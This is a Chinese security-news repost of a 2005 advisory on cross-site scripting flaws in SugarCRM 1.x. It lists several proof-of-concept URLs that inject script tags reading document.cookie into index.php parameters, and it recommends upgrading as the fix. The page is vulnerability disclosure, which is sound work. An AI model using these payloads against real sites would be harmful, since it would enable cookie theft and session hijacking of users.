| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
Cross Site Scripting Vulnerabilities
Cross Site Scripting Vulnerabilities
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:39:37
Cross Site Scripting Vulnerabilities and Possible Code Execution
来源: Joxean Koret <joxeankoret () yahoo ! es>
日期: 2005-01-01 19:58:44
安全通告:<1104609524.17665.4.camel () nemobox>
受影响软件的描述:
SugarCRM 1.X是一个管理向导,时机,社会联系并且都在一个最新型的用户界面内,它建立在PHP 和MySQL上 。
网站 : http://sugarcrm.sourceforge.net

漏洞描述:跨站脚本漏洞
在主要的脚本(index.php)中有用于写html代码的各种不同的参数没有被确认。
至少下面的网址就很容易被跨站脚本攻击:
http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_ /
module="><script>alert(document.cookie)</script>&return_action=index

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_ /
module=&return_action="><script>alert(document.cookie)</script>

http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%
3Ealert%28document.cookie%29%3C%2Fscript%
3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Sea /
rch

这下面网址是跨站脚本攻击漏洞并且可能远程执行任意PHP代码

漏洞如下:

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><scr /
ipt>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&r /
ecord=[RECORD ID]"><script>alert(document.cookie)</script>

修补方法:升级到最新版本
网址 : http://sugarcrm.sourceforge.net
发现者: Jose Antonio Coret (Joxean Koret)

【转自世纪安全网 http://www.21safe.com】
文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    支点网遭遇持续DDOS攻击
    中国发生大面积网络瘫痪
    DDoS攻击:“缓存溢出”
    支点网遭遇持续DDOS攻击
    中国发生大面积网络瘫痪
    DDoS攻击:“缓存溢出”
    Cisco Secure Desktop多
    Apple Safari javas
    Kerio WinRoute防火墙DN
    Cisco Secure Desktop多

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览